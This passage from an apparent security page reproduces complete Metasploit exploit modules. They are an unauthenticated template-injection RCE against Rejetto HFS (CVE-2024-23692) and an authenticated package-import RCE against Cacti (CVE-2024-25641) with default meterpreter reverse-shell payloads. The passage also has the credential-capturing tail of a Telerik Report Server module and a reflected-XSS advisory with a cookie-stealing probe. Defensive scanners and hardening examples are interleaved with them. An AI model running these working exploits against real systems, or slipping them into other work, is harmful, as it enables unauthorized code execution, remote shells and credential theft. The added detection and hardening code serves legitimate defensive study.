obtain the client ID') unless client_id.present?<br /><br />    begin<br />      send_request_api(<br />        "reports/clients/#{client_id}/parameters",<br />        data: {<br />          'report' => "NAME/#{category['Name']}/#{report_name}/",<br />          'parameterValues' => {}<br />        }<br />      )<br />    rescue Msf::Exploit::Failed => e<br />      raise e unless fail_reason == Failure::UnexpectedReply<br /><br />      print_good('The server responded with an error indicating that the payload was executed')<br />      self.fail_reason = Failure::None<br />    end<br />  end<br /><br />  def cleanup<br />    return unless @report && @access_token<br /><br />    print_status("Deleting report '#{@report['Name']}' (ID: #{@report['Id']})")<br />    send_request_api("reportserver/reports/#{@report['Id']}", method: 'DELETE')<br />  end<br /><br />  def report_creds(user, pass)<br />    credential_data = {<br />      module_fullname: fullname,<br />      username: user,<br />      private_data: pass,<br />      private_type: :password,<br />      workspace_id: myworkspace_id,<br />      last_attempted_at: Time.now,<br />      status: Metasploit::Model::Login::Status::SUCCESSFUL<br />    }.merge(service_details)<br /><br />    create_credential_and_login(credential_data)<br />  end<br />end<br /></code></pre>
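The build_trdp method above shows what the malicious report package is: a zip holding [Content_Types].xml and a definition.xml whose ResourceDictionary carries a WPF ObjectDataProvider that starts a Process. That structure is also what a defender can look for in uploaded or stored reports. The scanner below is an added example written for this page, not Metasploit or Progress code: it opens a .trdp package from bytes, reads every XML member and reports the gadget markers taken from the module's own definition.xml. Both sample packages are constructed inline in the same two-member layout; the benign report body is a stand-in, not a real Telerik report.

```python
import io
import zipfile

# Markers lifted from the definition.xml the module builds; none belongs in an ordinary report
GADGET_MARKERS = (
    "ObjectDataProvider",
    "clr-namespace:System.Diagnostics",
    "ProcessStartInfo",
)


def scan_trdp(package: bytes):
    """Return a list of (member_name, marker) hits; an empty list means no gadget was seen."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(package)) as zf:
            for name in zf.namelist():
                if not name.lower().endswith(".xml"):
                    continue
                text = zf.read(name).decode("utf-8", errors="replace")
                for marker in GADGET_MARKERS:
                    if marker in text:
                        hits.append((name, marker))
    except zipfile.BadZipFile:
        # A .trdp that is not a zip at all is worth flagging on its own
        hits.append(("<package>", "not a zip archive"))
    return hits


def build_package(definition_xml: str) -> bytes:
    """Constructed sample: the same two-member layout as the module's build_trdp."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="xml" ContentType="application/zip" /></Types>')
        zf.writestr("definition.xml", definition_xml)
    return buf.getvalue()


# Constructed benign report body (stand-in, not a real Telerik report definition)
BENIGN_REPORT = ('<Report Width="6.5in" Name="sales" xmlns="http://schemas.telerik.com/reporting/2021/1.0">'
                 '<Items><TextBox Name="title" Value="Quarterly sales" /></Items></Report>')

# Constructed gadget report: the module's ResourceDictionary with a harmless echo as the command
GADGET_REPORT = ('<Report Width="6.5in" Name="oooo" xmlns="http://schemas.telerik.com/reporting/2021/1.0"><Items>'
                 '<ResourceDictionary xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, '
                 'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"'
                 ' xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, '
                 'Culture=neutral, PublicKeyToken=b77a5c561934e089"'
                 ' xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, '
                 'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35">'
                 '<ODP:ObjectDataProvider MethodName="Start"><ObjectInstance><Diag:Process><StartInfo>'
                 '<Diag:ProcessStartInfo FileName="cmd" Arguments="/c echo test" /></StartInfo></Diag:Process>'
                 '</ObjectInstance></ODP:ObjectDataProvider></ResourceDictionary></Items></Report>')


if __name__ == "__main__":
    print("benign:", scan_trdp(build_package(BENIGN_REPORT)))
    print("gadget:", scan_trdp(build_package(GADGET_REPORT)))
```

The module submits the package base64-encoded in the reportContent field of api/reportserver/report, so the same scan can be applied at that API boundary or over the report store after the fact; a single hit on any marker is enough to pull the report for review.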
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template<br /> injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges<br /> of the user account running the HFS.exe server process. This exploit has been tested to work against version<br /> 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers<br /> and no patch is available. 
Users are recommended to upgrade to newer supported versions.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # Metasploit exploit<br /> 'Arseniy Sharoglazov' # Original finder<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-23692'],<br /> ['URL', 'https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/'],<br /> ],<br /> 'DisclosureDate' => '2024-05-25',<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> # Tested against Rejetto HFS version:<br /> # * 2.4.0 RC7<br /> # * 2.3m<br /> 'Automatic', {}<br /> ],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => '"'<br /> },<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> # If the HFS.exe process is run in a desktop session, the payload cmd.exe window will momentarily popup.<br /> SCREEN_EFFECTS<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to the web application', '']),<br /> ]<br /> )<br /> end<br /><br /> def send_ssti_request_cgi(template, opts = {})<br /> opts['vars_get'] ||= {}<br /> opts['headers'] ||= {}<br /><br /> # The 'search' query parameter is echoed into the content before server side template processing occurs on the<br /> # content being processed. Under normal operation any user supplied content will be escaped, so any symbols, which<br /> # are encoded as '%symbol%' and macro which are encoded as '{:macro:}' will be escaped to prevent SSTI.<br /><br /> # However we can force a percent symbol to become un-escaped. This allows us to embed any symbol in the content<br /> # being processed. We can leverage this to force the '%url%' symbol to become unescaped. 
This will echo back the<br /> # remainder of the un-encoded URL into the server side content.<br /><br /> # To inject our own content, we need to first write a MARKER_UNQUOTE ':}' sequence,<br /> # however this will be filtered. We can then bypass the filtering for ':}' by leveraging the %host% symbol and an<br /> # empty host header value. So ':%host%}' will become ':}' and this will not be escaped. After this happens we can<br /> # perform an arbitrary template injection of any HFS symbols or macros we want.<br /><br /> opts['vars_get'].merge!({<br /> 'search' => "%25#{Rex::Text.rand_text_alpha(1)}%25url%25:%host%}#{template}"<br /> })<br /><br /> # The Host header must be an empty string for the above symbol substitution to bypass the MARKER_UNQUOTE filtering.<br /> opts['headers'].merge!({<br /> 'Host' => ''<br /> })<br /><br /> opts['method'] = ['GET', 'POST'].sample<br /><br /> opts['uri'] = normalize_uri(target_uri.path)<br /><br /> opts['encode_params'] = false<br /><br /> send_request_cgi(opts)<br /> end<br /><br /> def check<br /> cookie_name = Rex::Text.rand_text_alphanumeric(32)<br /> cookie_value = Rex::Text.rand_text_alphanumeric(32)<br /><br /> # Our check routine will leverage the SSTI vulnerability and use it to read a cookie value by its name, writing<br /> # this value to the response output. 
In addition we will write the current server version into the response output.<br /> # We can therefore verify if a target is vulnerable by first confirming the expected cookie value is now present<br /> # in the response output, and if so we can also pull out the target servers version number.<br /> res = send_ssti_request_cgi(<br /> "{.cookie|#{cookie_name}.}=%version%=",<br /> {<br /> 'headers' => {<br /> 'Cookie' => "#{cookie_name}=#{cookie_value}"<br /> }<br /> }<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> version = res.body.match(/#{cookie_value}=([^=]+)=/)<br /><br /> return CheckCode::Vulnerable("Rejetto HFS version #{version[1]}") if version<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> command_string = "\"cmd\" \"/c #{payload.encoded}\""<br /><br /> command_chars = command_string.unpack('C*').join('|')<br /><br /> # To get code execution we leverage the 'exec' macro. We must leverage the 'chr' macro to construct an arbitrary<br /> # command string in order to avoid the server filtering out certain characters such as '%'. To avoid executing the<br /> # payload 4 times, we leverage the 'break' macro to stop processing the output.<br /> send_ssti_request_cgi("{.exec|{.chr|#{command_chars}.}.}{.break.}")<br /> end<br />end<br /></code></pre>
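A defender's counterpart to the module above, added here as an example; it is not part of the Metasploit module or the original write-up. It is a small Ruby log scanner that flags the request shape the module depends on: a double-encoded `%25` in the `search` parameter, the `%url%`/`%host%`/`%version%` symbols and `{.macro.}` syntax after decoding, and an empty Host header. The log format, the `search_param`/`ssti_indicators`/`scan_log` helpers and the sample lines are all constructed for the demo; HFS's own log layout differs, so only the `LOG_LINE` regex needs adapting to real data.

```ruby
require 'cgi'

# Constructed log format for this demo (an assumption, not HFS's own log layout):
#   <client_ip> "<METHOD> <path?query> HTTP/x.y" host="<Host header value>" <status>
LOG_LINE = /\A(?<ip>\S+) "(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" host="(?<host>[^"]*)" (?<status>\d{3})\z/

# Template tokens as used in the module above: HFS symbols are written %name%,
# macros are written {.name|arg|arg.}; exec and chr are the ones that reach cmd.exe.
HFS_SYMBOL  = /%(?:url|host|version)%/i
HFS_MACRO   = /\{\.([a-z]+)[|.]/i
EXEC_MACROS = %w[exec chr].freeze

# Pull the raw (still URL-encoded) value of the search parameter, or nil if absent.
def search_param(target)
  query = target.split('?', 2)[1]
  return nil if query.nil?
  query.split('&').each do |pair|
    key, value = pair.split('=', 2)
    return value.to_s if key == 'search'
  end
  nil
end

# Returns nil for an unparseable line, [] for a clean request, otherwise the list of
# indicators observed, ordered from weakest to strongest.
def ssti_indicators(line)
  m = LOG_LINE.match(line)
  return nil unless m
  raw = search_param(m[:target])
  return [] if raw.nil?

  # CGI.unescape is lenient: '%ur' is left alone while '%25' becomes '%', which is the
  # decoding step the module relies on to get a bare '%' past HFS's escaping.
  decoded = CGI.unescape(raw)
  macros  = decoded.scan(HFS_MACRO).flatten.map(&:downcase)

  hits = []
  hits << :double_encoded_percent if raw.include?('%25')
  hits << :hfs_symbol if decoded.match?(HFS_SYMBOL)
  hits << :hfs_macro unless macros.empty?
  hits << :exec_macro if (macros & EXEC_MACROS).any?
  hits << :empty_host_header if m[:host].empty?
  hits
end

# Scan a batch of lines and keep only the suspicious ones, with a simple score.
def scan_log(lines)
  lines.each_with_object([]) do |line, out|
    hits = ssti_indicators(line)
    next if hits.nil? || hits.empty?
    out << { line: line, indicators: hits, score: hits.size }
  end
end

# Constructed sample traffic: one benign search, one probe shaped like the module's
# check routine, one shaped like its exploit routine, and one unrelated request.
SAMPLE_LOG = [
  '10.0.0.5 "GET /?search=quarterly%20report HTTP/1.1" host="files.example.internal" 200',
  '10.0.0.9 "GET /?search=%25a%25url%25:%host%}{.cookie|abc.}=%version%= HTTP/1.1" host="" 200',
  '10.0.0.9 "POST /?search=%25q%25url%25:%host%}{.exec|{.chr|34|99|109|100|34.}.}{.break.} HTTP/1.1" host="" 200',
  '10.0.0.7 "GET /docs/index.html HTTP/1.1" host="files.example.internal" 200'
].freeze

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each do |hit|
    puts "score=#{hit[:score]} #{hit[:indicators].join(',')} :: #{hit[:line]}"
  end
end
```

The empty Host header is the cheapest signal to alert on by itself: a browser never sends one, and the module needs it for the `:%host%}` trick, so a reverse proxy in front of HFS can reject such requests before they reach the template engine. The macro names are reported separately because `{.cookie.}` alone is a probe while `{.exec.}` or `{.chr.}` is execution.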
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Cacti<br /> include Msf::Payload::Php<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cacti Import Packages RCE',<br /> 'Description' => %q{<br /> This exploit module leverages an arbitrary file write vulnerability<br /> (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It<br /> abuses the `Import Packages` feature to upload a specially crafted<br /> package that embeds a PHP file. Cacti will extract this file to an<br /> accessible location. The module finally triggers the payload to execute<br /> arbitrary PHP code in the context of the user running the web server.<br /><br /> Authentication is needed and the account must have access to the<br /> `Import Packages` feature. 
This is granted by setting the `Import<br /> Templates` permission in the `Template Editor` section.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Egidio Romano', # Initial research and discovery<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://karmainsecurity.com/KIS-2024-04'],<br /> [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88'],<br /> [ 'CVE', '2024-25641']<br /> ],<br /> 'Platform' => ['unix linux win'],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Arch' => ARCH_PHP,<br /> 'Platform' => 'php',<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select Meterpreter by default<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select a x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select a x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2024-05-12',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [ true, 'User to login with', 'admin']),<br /> OptString.new('PASSWORD', [ 
true, 'Password to login with', 'admin']),<br /> OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Step 1 - Check if the target is Cacti and get the version<br /> print_status('Checking Cacti version')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?<br /><br /> html = res.get_html_document<br /> begin<br /> cacti_version = parse_version(html)<br /> version_msg = "The web server is running Cacti version #{cacti_version}"<br /> rescue Msf::Exploit::Cacti::CactiNotFoundError => e<br /> return CheckCode::Safe(e.message)<br /> rescue Msf::Exploit::Cacti::CactiVersionNotFoundError => e<br /> return CheckCode::Unknown(e.message)<br /> end<br /><br /> if Rex::Version.new(cacti_version) < Rex::Version.new('1.2.27')<br /> print_good(version_msg)<br /> else<br /> return CheckCode::Safe(version_msg)<br /> end<br /><br /> # Step 2 - Login<br /> @csrf_token = parse_csrf_token(html)<br /> return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?<br /><br /> begin<br /> do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)<br /> rescue Msf::Exploit::Cacti::CactiError => e<br /> return CheckCode::Unknown("Login failed: #{e}")<br /> end<br /><br /> @logged_in = true<br /><br /> # Step 3 - Check if the user has enough permissions to reach `package_import.php`<br /> print_status('Checking permissions to access `package_import.php`')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('Could not access `package_import.php` - no response') if res.nil?<br /> return CheckCode::Unknown("Could not access 
`package_import.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200<br /> # The form with the CSRF token input field is not present when access is denied<br /> if parse_csrf_token(res.get_html_document).empty?<br /> return CheckCode::Safe('Could not access `package_import.php` - insufficient permissions')<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> # Taken from modules/payloads/singles/php/exec.rb<br /> def php_exec(cmd)<br /> dis = '$' + rand_text_alpha(4..7)<br /> shell = <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /><br /> Rex::Text.compress(shell)<br /> end<br /><br /> def generate_package<br /> @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"<br /><br /> php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)<br /><br /> digest = OpenSSL::Digest.new('SHA256')<br /> pkey = OpenSSL::PKey::RSA.new(2048)<br /> file_signature = pkey.sign(digest, php_payload)<br /><br /> xml_data = <<~XML<br /> <xml><br /> <files><br /> <file><br /> <name>#{@payload_path}</name><br /> <data>#{Rex::Text.encode_base64(php_payload)}</data><br /> <filesignature>#{Rex::Text.encode_base64(file_signature)}</filesignature><br /> </file><br /> </files><br /> <publickey>#{Rex::Text.encode_base64(pkey.public_key.to_pem)}</publickey><br /> <signature></signature><br /> </xml><br /> XML<br /><br /> signature = pkey.sign(digest, xml_data)<br /> xml_data.sub!('<signature></signature>', "<signature>#{Rex::Text.encode_base64(signature)}</signature>")<br /><br /> Rex::Text.gzip(xml_data)<br /> end<br /><br /> def upload_package<br /> print_status('Uploading the package')<br /> # Default parameters sent when importing packages from the web UI<br /> # Randomizing these values might be suspicious<br /> vars_form = {<br /> '__csrf_magic' => 
@csrf_token,<br /> 'trust_signer' => 'on',<br /> 'data_source_profile' => '1',<br /> 'remove_orphans' => 'on',<br /> 'replace_svalues' => 'on',<br /> 'image_format' => '3',<br /> 'graph_height' => '200',<br /> 'graph_width' => '700',<br /> 'save_component_import' => '1',<br /> 'preview_only' => 'on',<br /> 'action' => 'save'<br /> }<br /><br /> vars_form_data = []<br /> vars_form.each do |name, data|<br /> vars_form_data << { 'name' => name, 'data' => data }<br /> end<br /><br /> vars_form_data << {<br /> 'name' => 'import_file',<br /> 'filename' => "#{rand_text_alphanumeric(5..10)}.xml.gz",<br /> 'content_type' => 'application/x-gzip',<br /> 'encoding' => 'binary',<br /> 'data' => generate_package<br /> }<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_form_data' => vars_form_data<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when sending the preview import request') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code (#{res.code}) when sending the preview import request") unless res.code == 200<br /><br /> html = res.get_html_document<br /> local_path = html.xpath('//input[starts-with(@id, "chk_file")]/@title').text<br /> fail_with(Failure::Unknown, 'Unable to import the package') if local_path.empty?<br /><br /> vars_form['preview_only'] = ''<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => vars_form<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when importing the package') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code when importing the package (#{res.code})") unless res.code == 302<br /><br /> local_path<br /> end<br /><br /> def trigger_payload<br /> 
# Expecting no response<br /> print_status('Triggering the payload')<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, @payload_path),<br /> 'method' => 'GET'<br /> }, 1)<br /> end<br /><br /> def exploit<br /> # Setting the `FETCH_DELETE` option seems to break the payload execution.<br /> # `Msf::Exploit::FileDropper` will be used later to cleanup. Note that it<br /> # is not possible to opt-out anymore.<br /> fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']<br /><br /> unless @csrf_token<br /> begin<br /> @csrf_token = get_csrf_token<br /> rescue CactiError => e<br /> fail_with(Failure::NotFound, "Unable to get the CSRF token: #{e.class} - #{e}")<br /> end<br /> end<br /><br /> unless @logged_in<br /> begin<br /> do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)<br /> rescue CactiError => e<br /> fail_with(Failure::NoAccess, "Login failure: #{e.class} - #{e}")<br /> end<br /> end<br /><br /> package_path = upload_package<br /><br /> register_file_for_cleanup(package_path)<br /><br /> # For fetch payloads, setting the `FETCH_DELETE` option seems to break the<br /> # payload execution. Using `#register_file_for_cleanup` instead, since we<br /> # know the local path.<br /> if target['Type'] != :php && payload_instance.is_a?(Msf::Payload::Adapter::Fetch)<br /> if File.absolute_path?(datastore['FETCH_FILENAME'])<br /> register_file_for_cleanup(datastore['FETCH_FILENAME'])<br /> else<br /> register_file_for_cleanup(File.join(File.dirname(package_path), datastore['FETCH_FILENAME']))<br /> end<br /> end<br /><br /> trigger_payload<br /> end<br /><br />end<br /></code></pre>
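The module's `generate_package` shows why a package signature proves nothing on its own: the package carries both the signature and the public key that verifies it, so any freshly generated key "signs" correctly, and `trust_signer` tells the importer to accept it. The following Ruby is an added example, not Cacti's code nor part of the Metasploit module: it rebuilds a package the same way (`build_package`), then verifies it on the import side against a pinned set of signer fingerprints and a path policy. The policy (`WEB_EXECUTABLE`, `safe_path?`), the vendor and attacker keys, and the file names are all constructed for the demo and are not Cacti's actual rules.

```ruby
require 'openssl'
require 'zlib'

def b64(bytes)
  [bytes].pack('m0')
end

def unb64(text)
  text.unpack1('m')
end

# Build a gzip'd package with one embedded file, signed by `pkey`, the same way the
# module above does: the outer signature covers the XML with an empty <signature> slot.
def build_package(pkey, path, content)
  xml = <<~XML
    <xml>
      <files><file><name>#{path}</name><data>#{b64(content)}</data><filesignature>#{b64(pkey.sign('SHA256', content))}</filesignature></file></files>
      <publickey>#{b64(pkey.public_key.to_pem)}</publickey>
      <signature></signature>
    </xml>
  XML
  signed = xml.sub('<signature></signature>', "<signature>#{b64(pkey.sign('SHA256', xml))}</signature>")
  Zlib.gzip(signed)
end

# Minimal element extraction, enough for the layout above (use a real XML parser in production).
def element(xml, tag)
  m = xml.match(%r{<#{tag}>(.*?)</#{tag}>}m)
  raise ArgumentError, "missing <#{tag}>" unless m
  m[1].strip
end

def key_fingerprint(pub)
  OpenSSL::Digest::SHA256.hexdigest(pub.to_der)
end

# Constructed policy: absolute paths, traversal and anything the web server would
# execute are refused whatever the signature says.
WEB_EXECUTABLE = %w[.php .phtml .phar].freeze

def safe_path?(name)
  return false if name.start_with?('/') || name.include?('\\')
  return false if name.split('/').include?('..')
  !WEB_EXECUTABLE.include?(File.extname(name).downcase)
end

# Returns the signer fingerprint and a list of findings; accept only when it is empty.
# The embedded key must also be in the importer's trusted set: that is the check the
# 'trust_signer' form value lets the module skip.
def verify_package(gz, trusted_fingerprints)
  xml = Zlib.gunzip(gz).force_encoding('UTF-8')
  pub = OpenSSL::PKey::RSA.new(unb64(element(xml, 'publickey')))
  fingerprint = key_fingerprint(pub)
  findings = []

  unsigned = xml.sub(%r{<signature>.*?</signature>}m, '<signature></signature>')
  findings << :bad_package_signature unless pub.verify('SHA256', unb64(element(xml, 'signature')), unsigned)
  findings << :untrusted_signer unless trusted_fingerprints.include?(fingerprint)

  name = element(xml, 'name')
  data = unb64(element(xml, 'data'))
  findings << :bad_file_signature unless pub.verify('SHA256', unb64(element(xml, 'filesignature')), data)
  findings << :unsafe_path unless safe_path?(name)

  { signer: fingerprint, file: name, findings: findings, accepted: findings.empty? }
end

# Swap the embedded file content without re-signing, to show both signatures fail.
def tamper(gz)
  xml = Zlib.gunzip(gz).force_encoding('UTF-8')
  Zlib.gzip(xml.sub(%r{<data>.*?</data>}m, "<data>#{b64('<xml><template>modified</template></xml>')}</data>"))
end

# Demo: a vendor-signed template versus a package signed with a fresh, unknown key that
# carries a .php file under resource/, the shape the module produces.
def demo
  vendor_key   = OpenSSL::PKey::RSA.new(2048)
  attacker_key = OpenSSL::PKey::RSA.new(2048)
  trusted = [key_fingerprint(vendor_key.public_key)]

  good = build_package(vendor_key, 'resource/interface_traffic.xml', '<xml><template/></xml>')
  bad  = build_package(attacker_key, 'resource/ab12cd.php', '<?php echo "constructed stand-in"; ?>')
  {
    vendor: verify_package(good, trusted),
    unknown: verify_package(bad, trusted),
    tampered: verify_package(tamper(good), trusted)
  }
end

if $PROGRAM_NAME == __FILE__
  demo.each { |label, r| puts "#{label}: accepted=#{r[:accepted]} findings=#{r[:findings].inspect} file=#{r[:file]}" }
end
```

The "unknown" package passes both cryptographic checks, which is exactly what the module relies on; it is rejected only by the two non-cryptographic checks, signer allowlisting and the path policy. Either one alone would have stopped the drop of `resource/<random>.php`, and on the detection side a package import that introduces a new signer fingerprint or a file with a server-executable extension is a reasonable alert condition.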
<pre><code># Exploit Title: Reflected Cross Site Scripting Exploit - Lost and Found Information System <br /># Exploit Author: Amit Roy (Rezur / AR0x7)<br /># Date: June 07, 2024<br /># Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip<br /># Tested on: Kali Linux, Apache, MySQL<br /># Version: v1.0<br /># Exploit Description:<br /># Lost and Found Information System v1.0 suffers from a Reflected Cross Site Scripting Vulnerability allowing attackers to execute JavaScript in the context of other users<br /># CVE : CVE-2024-37859<br /><br />1) Visit the following URL to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)><br /></code></pre>
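The advisory above describes a `page` parameter echoed into HTML unescaped. The following Ruby is an added illustration of the fix, written here rather than taken from the PHP application: a `page` router that accepts only identifiers from a fixed table and HTML-escapes anything it reflects. The routing table, the `PAGE_ID` shape and the helper names are constructed for the example and are not the application's own.

```ruby
require 'cgi'

# Constructed routing table (an assumption, not the application's real page list).
PAGES = { 'home' => 'Dashboard', 'items' => 'Lost and Found Items', 'users' => 'User List' }.freeze

# The probe from the advisory, used only to check what the two renderers emit.
XSS_PROBE = '<img src=x onerror=alert(document.cookie)>'.freeze

# The pattern behind the advisory: the request parameter is interpolated into HTML as-is,
# so an unknown page name is reflected verbatim into the "not found" message.
def render_page_vulnerable(page)
  title = PAGES[page]
  title ? "<h1>#{title}</h1>" : "<h1>Page #{page} not found</h1>"
end

# Hardened: the identifier must match a strict shape and exist in the table; only the
# table's own title is ever interpolated. If the value must be shown at all (here, in
# the 404 text), it is HTML-escaped, which covers the tag injection the advisory uses.
PAGE_ID = /\A[a-z_]{1,32}\z/

def render_page_hardened(page)
  page = page.to_s
  if page.match?(PAGE_ID) && PAGES.key?(page)
    "<h1>#{PAGES[page]}</h1>"
  else
    "<h1>Page #{CGI.escapeHTML(page)} not found</h1>"
  end
end

# True when the probe survives into the response byte-for-byte, i.e. the reflection is exploitable.
def reflected_unescaped?(html, probe = XSS_PROBE)
  html.include?(probe)
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{render_page_vulnerable(XSS_PROBE)}"
  puts "hardened:   #{render_page_hardened(XSS_PROBE)}"
end
```

Escaping alone would close this particular report, but the allowlist is what makes the router safe in every context: a page name that can only be one of a few known tokens never needs context-specific encoding, and a request with any other value can be logged as a probe.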